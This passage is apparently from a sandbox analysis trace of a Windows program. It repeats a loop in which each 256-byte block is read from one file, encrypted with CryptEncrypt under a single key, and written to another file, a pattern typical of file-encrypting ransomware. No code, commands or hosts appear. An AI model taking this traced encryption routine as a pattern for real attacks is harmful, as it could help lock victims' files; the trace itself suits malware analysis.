dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.586] GetLastError () returned 0x0 [0167.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.586] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.586] GetLastError () returned 0x0 [0167.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.586] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.586] GetLastError () returned 0x0 [0167.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.587] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.587] GetLastError () returned 0x0 [0167.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.587] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.587] GetLastError () returned 0x0 [0167.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.587] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.587] GetLastError () returned 0x0 [0167.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.587] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.587] GetLastError () returned 0x0 [0167.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.587] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.587] GetLastError () returned 0x0 [0167.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.587] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.587] GetLastError () returned 0x0 [0167.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.587] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.587] GetLastError () returned 0x0 [0167.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.588] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.588] GetLastError () returned 0x0 [0167.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.588] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.588] GetLastError () returned 0x0 [0167.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.588] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.588] GetLastError () returned 0x0 [0167.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.588] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.588] GetLastError () returned 0x0 [0167.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.588] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.588] GetLastError () returned 0x0 [0167.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.588] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.588] GetLastError () returned 0x0 [0167.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.589] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.589] GetLastError () returned 0x0 [0167.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.589] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.589] GetLastError () returned 0x0 [0167.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.589] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.589] GetLastError () returned 0x0 [0167.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.589] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.589] GetLastError () returned 0x0 [0167.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.589] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.589] GetLastError () returned 0x0 [0167.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.589] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.589] GetLastError () returned 0x0 [0167.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.589] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.589] GetLastError () returned 0x0 [0167.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.590] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.590] GetLastError () returned 0x0 [0167.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.590] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.590] GetLastError () returned 0x0 [0167.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.590] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.590] GetLastError () returned 0x0 [0167.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.590] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.590] GetLastError () returned 0x0 [0167.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.590] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.590] GetLastError () returned 0x0 [0167.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.590] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.590] GetLastError () returned 0x0 [0167.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.591] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.591] GetLastError () returned 0x0 [0167.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.591] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.591] GetLastError () returned 0x0 [0167.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.591] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.591] GetLastError () returned 0x0 [0167.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.591] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, 